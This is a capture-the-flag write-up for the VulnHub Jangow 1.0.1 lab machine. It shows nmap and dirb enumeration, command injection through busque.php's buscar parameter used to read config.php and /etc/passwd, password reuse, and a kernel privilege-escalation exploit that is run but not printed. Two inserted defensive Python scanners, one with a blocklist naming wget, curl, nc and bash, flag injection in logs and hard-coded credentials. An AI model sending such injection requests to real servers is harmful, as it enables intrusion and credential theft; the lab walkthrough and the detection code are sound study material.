Description: This is a write-up of the Jangow 1.0.1 CTF from VulnHub. This is an easy box, in which I'll cover how I got the root flag using an HTTP RCE and privilege escalation.
Footprinting
Open ports
I looked for open ports using Nmap:
kali@kali:~$ mkdir nmap
kali@kali:~$ sudo nmap -v3 -O -sS -p- -Pn -oA nmap/syn_full 192.168.56.118
Scanning 192.168.56.118 [65535 ports]
Discovered open port 21/tcp on 192.168.56.118
Discovered open port 80/tcp on 192.168.56.118
Ports 21 (FTP) and 80 (HTTP) are open (ports list).
Scanning these ports for vulnerabilities (default scripts and version detection) shows nothing really interesting:
kali@kali:~$ nmap -v3 -p21,80 -sC -sV -oA nmap/vuln 192.168.56.118
kali@kali:~$ cat nmap/vuln.nmap
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 255 vsftpd 3.0.3
80/tcp open http syn-ack ttl 255 Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
HTTP
Enumeration
Let's enumerate the resources of the website using dirb:
kali@kali:~$ dirb http://192.168.56.118/ /usr/share/wordlists/dirb/common.txt -o dirb.txt
kali@kali:~$ cat dirb.txt
---- Scanning URL: http://192.168.56.118/ ----
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/site/
---- Entering directory: http://192.168.56.118/site/ ----
==> DIRECTORY: http://192.168.56.118/site/assets/
==> DIRECTORY: http://192.168.56.118/site/css/
+ http://192.168.56.118/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.56.118/site/js/
==> DIRECTORY: http://192.168.56.118/site/wordpress/
---- Entering directory: http://192.168.56.118/site/assets/ ----
---- Entering directory: http://192.168.56.118/site/css/ ----
---- Entering directory: http://192.168.56.118/site/js/ ----
---- Entering directory: http://192.168.56.118/site/wordpress/ ----
When navigating the website, I saw a page called busque.php:
http://192.168.56.118/site/busque.php?buscar=
After a lot of trial and error, the following enumeration gave me some hints:
kali@kali:~$ sudo apt install seclists
kali@kali:~$ while read l; do
echo $l;
curl "http://192.168.56.118/site/busque.php?buscar=$l" >> buscar.txt;
done < /usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt
Basically, this loop sends every line of the 1-4_all_letters_a-z.txt wordlist as the value of the buscar parameter, and appends each response to the file buscar.txt:
kali@kali:~$ less buscar.txt
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Filesystem 1K-blocks Used Available Use% Mounted on
udev 488968 0 488968 0% /dev
tmpfs 101628 3192 98436 4% /run
/dev/sda1 11221232 2095112 8533072 20% /
tmpfs 508136 0 508136 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 508136 0 508136 0% /sys/fs/cgroup
8 ./js
20 ./wordpress
1100 ./assets/img
1128 ./assets
208 ./css
1388 .
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Usage: iw [options] command
Options:
--debug enable netlink debugging
--version show version (3.17)
Commands:
...
Oh?! This output looks familiar!
Usage: iw [options] command
Options:
--debug enable netlink debugging
--version show version (3.17)
Commands:
...
It's the usage message of a command called iw.
OS command execution
You probably guessed it! We can run shell commands on the web server through the buscar GET parameter:
>>>
GET /site/busque.php?buscar=ls+-a HTTP/1.1
Host: 192.168.56.118
<<<
.
..
assets
busque.php
css
index.html
js
wordpress
We can use a simple Python script to automate sending OS commands through the URL. Indeed, the content of busque.php is:
>>>
GET /site/busque.php?buscar=cat+busque.php HTTP/1.1
Host: 192.168.56.118
<<<
<?php system($_GET['buscar']); ?>
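That one-liner hands the raw GET parameter to a shell, so every request to busque.php is recorded in the Apache access log with the injected command in clear. The script below is an added example, not part of the original write-up: it parses Apache "combined" access-log lines, decodes the query string once, and flags buscar values that look like shell commands (a known command name, shell metacharacters, or a sensitive path as an argument). The log lines in SAMPLE_LOG are constructed to mirror the requests shown in this write-up plus a few benign searches; the timestamps and client address are made up.

```python
"""Flag suspected OS command injection in the buscar parameter of busque.php.

Added example, not part of the original write-up: it parses Apache
"combined" access-log lines, decodes the query string once, and checks each
buscar value for shell-command indicators. SAMPLE_LOG is constructed to
mirror the requests shown in the write-up plus a few benign searches.
"""
import re
import shlex
from urllib.parse import parse_qs, urlsplit

# Apache combined format: host ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Commands a search box has no business running (the ones seen in the write-up are included).
SUSPICIOUS_COMMANDS = {
    "id", "ls", "cat", "whoami", "uname", "w", "df", "du", "iw", "grep",
    "wget", "curl", "nc", "bash", "sh", "python", "perl", "chmod", "gcc",
}
# Shell metacharacters that chain, substitute or redirect commands.
METACHARS = re.compile(r"[;&|`$<>]")

# Constructed log lines: the four injected requests from the write-up, then benign traffic.
SAMPLE_LOG = """
192.168.56.1 - - [10/Jun/2021:18:05:01 +0000] "GET /site/busque.php?buscar=ls+-a HTTP/1.1" 200 71 "-" "curl/7.74.0"
192.168.56.1 - - [10/Jun/2021:18:05:02 +0000] "GET /site/busque.php?buscar=cat+busque.php HTTP/1.1" 200 35 "-" "curl/7.74.0"
192.168.56.1 - - [10/Jun/2021:18:05:03 +0000] "GET /site/busque.php?buscar=cat+wordpress/config.php HTTP/1.1" 200 412 "-" "curl/7.74.0"
192.168.56.1 - - [10/Jun/2021:18:05:04 +0000] "GET /site/busque.php?buscar=grep+sh$+/etc/passwd HTTP/1.1" 200 120 "-" "curl/7.74.0"
192.168.56.1 - - [10/Jun/2021:18:05:05 +0000] "GET /site/busque.php?buscar=jangow HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Jun/2021:18:05:06 +0000] "GET /site/index.html HTTP/1.1" 200 10190 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Jun/2021:18:05:07 +0000] "GET /site/busque.php?buscar= HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""


def analyse_buscar(value: str) -> dict:
    """Return the indicators found in one decoded buscar value."""
    indicators = []
    if METACHARS.search(value):
        indicators.append("shell-metacharacter")
    try:
        tokens = shlex.split(value)
    except ValueError:  # unbalanced quotes: still worth a look
        tokens = value.split()
        indicators.append("unbalanced-quotes")
    first = tokens[0] if tokens else ""
    if first.rsplit("/", 1)[-1] in SUSPICIOUS_COMMANDS:  # "/bin/cat" -> "cat"
        indicators.append(f"command:{first}")
    if any(t.startswith("/etc/") or t.endswith((".php", ".conf")) for t in tokens[1:]):
        indicators.append("sensitive-path")
    return {"value": value, "indicators": indicators, "suspicious": bool(indicators)}


def parse_line(line: str):
    """Extract the decoded buscar value from one log line, or None if it is not a busque.php hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not target.path.endswith("/busque.php"):
        return None
    # parse_qs already turns '+' into a space and decodes %XX; decoding twice would
    # corrupt values that legitimately contain '+' or '%'.
    params = parse_qs(target.query, keep_blank_values=True)
    return {
        "host": m["host"],
        "time": m["time"],
        "status": int(m["status"]),
        "buscar": params.get("buscar", [""])[0],
    }


def scan_log(lines) -> list:
    """Return one record per request whose buscar value looks like a shell command."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = analyse_buscar(rec["buscar"])
        if verdict["suspicious"]:
            rec["indicators"] = verdict["indicators"]
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.strip().splitlines()):
        print(f'{hit["time"]} {hit["host"]} buscar={hit["buscar"]!r} -> {", ".join(hit["indicators"])}')
```

The metacharacter check alone would also flag an innocent search such as "rock & roll", so the indicators are kept separate in the output rather than collapsed into a single score; a command name in first position, or a command plus a path like /etc/passwd, is the combination that deserves an alert. Feeding a real access log means replacing SAMPLE_LOG with the file's lines and possibly adapting LOG_RE to the LogFormat in use.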
In the wordpress directory, there is a configuration file:
>>>
GET /site/busque.php?buscar=ls+wordpress HTTP/1.1
Host: 192.168.56.118
<<<
config.php
index.html
And it contains a password!
>>>
GET /site/busque.php?buscar=cat+wordpress/config.php HTTP/1.1
Host: 192.168.56.118
<<<
<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>
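A database password sitting in clear text inside the web root is exactly what a command-injection bug turns into a foothold, so it is worth being able to find such files before someone else does. The scanner below is an added example, not from the write-up or the box's author: it reports assignments to PHP variables whose name suggests a secret, redacts the value in its output, and notes whether the file is world-readable (anything the web server user can read can be dumped through busque.php). It goes a little beyond the config.php above in that it also handles the define('DB_PASSWORD', ...) form WordPress uses; SAMPLE_CONFIG is the config.php shown above, SAMPLE_WP_CONFIG is a constructed second file, and the web root it builds is a throwaway temp directory.

```python
"""Find hard-coded credentials in PHP configuration files under a web root.

Added example, not part of the original write-up: it reports assignments to
variables (or define() constants, as WordPress uses) whose name suggests a
secret, redacts the value in the report, and notes whether the file is
world-readable, since anything the web server user can read can be dumped
through a bug like busque.php. SAMPLE_CONFIG is the config.php from the
write-up, embedded here as test input; the web root it builds is a temp dir.
"""
import os
import re
import stat
import tempfile

SECRET_NAME = re.compile(r"pass(word|wd)?|secret|token|api_?key|auth_key|salt", re.IGNORECASE)
# $name = "value";  or  $name = 'value';
ASSIGN_RE = re.compile(r"""\$(?P<name>\w+)\s*=\s*(?P<q>["'])(?P<value>[^"']*)(?P=q)\s*;""")
# define('NAME', 'value');  (wp-config.php style)
DEFINE_RE = re.compile(
    r"""define\(\s*(?P<q1>["'])(?P<name>\w+)(?P=q1)\s*,\s*(?P<q2>["'])(?P<value>[^"']*)(?P=q2)\s*\)"""
)

# The config.php recovered in the write-up, used here as test input.
SAMPLE_CONFIG = """<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
?>
"""
# Constructed second file to show the define() form is handled too.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'desafio02');
define('DB_USER', 'desafio02');
define('DB_PASSWORD', 'abygurl69');
define('DB_HOST', 'localhost');
"""


def redact(value: str) -> str:
    """Keep the first character and the length so the report itself does not leak the secret."""
    return value[:1] + "*" * (len(value) - 1)


def scan_php_source(text: str, path: str = "<string>") -> list:
    """Return one finding per secret-looking assignment in a PHP source text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in list(ASSIGN_RE.finditer(line)) + list(DEFINE_RE.finditer(line)):
            name, value = m["name"], m["value"]
            if value and SECRET_NAME.search(name):
                findings.append({
                    "path": path, "line": lineno, "name": name,
                    "redacted": redact(value), "length": len(value),
                })
    return findings


def is_world_readable(path: str) -> bool:
    """True when the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def scan_webroot(root: str) -> list:
    """Walk a web root and scan every .php file, tagging each finding with the file's readability."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read(), path)
            for hit in hits:
                hit["world_readable"] = is_world_readable(path)
            findings.extend(hits)
    return findings


def build_demo_webroot() -> str:
    """Create a throwaway web root laid out like the target's site/wordpress/ directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    wp = os.path.join(root, "site", "wordpress")
    os.makedirs(wp)
    for name, body in (("config.php", SAMPLE_CONFIG), ("wp-config.php", SAMPLE_WP_CONFIG)):
        path = os.path.join(wp, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, 0o644)  # the usual default: readable by every local account
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_demo_webroot()):
        flag = "WORLD-READABLE" if f["world_readable"] else "restricted"
        print(f'{f["path"]}:{f["line"]} {f["name"]} = {f["redacted"]} ({f["length"]} chars, {flag})')
```

Run against a real web root, the same call (scan_webroot("/var/www/html") or wherever the site lives) lists every file that would need moving outside the document root, tightening to mode 0640 owned by the web server group, or replacing with credentials read from the environment. The name regex is deliberately loose; false positives cost a glance, a missed password costs the box.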
FTP
Let's try these credentials on FTP:
kali@kali:~$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): desafio02
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
Ok, it failed :/
Local privilege escalation
user.txt
Actually, this password belongs to the jangow01 user: the credentials are jangow01:abygurl69. Thus, we can switch to the Jangow virtual machine's console and log in at the prompt.
In jangow01's home directory, we get the user flag :-]
jangow01@jangow01:~$ cat /home/jangow01/user.txt
d4[...]7e
Are there other users registered on the web server?
>>>
GET /site/busque.php?buscar=grep+sh$+/etc/passwd HTTP/1.1
Host: 192.168.56.118
<<<
root:x:0:0:root:/root:/bin/bash
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
Nope (other than root). So we want to escalate from jangow01 to root.
proof.txt
Looking at the kernel version, lots of exploits exist for it:
jangow01@jangow01:~$ uname -a
Ubuntu 16.04, kernel 4.4.0-31
After some trial and error, this one worked. I compiled the exploit on the machine and executed it:
More details here.
jangow01@jangow01:~$ gcc ./cve-2017-16995.c -o ./cve-2017-16995
jangow01@jangow01:~$ chmod +x ./cve-2017-16995
jangow01@jangow01:~$ ./cve-2017-16995
Finally, we can read the root flag!
$ whoami
root
$ ls /root
proof.txt
$ cat /root/proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da[...]09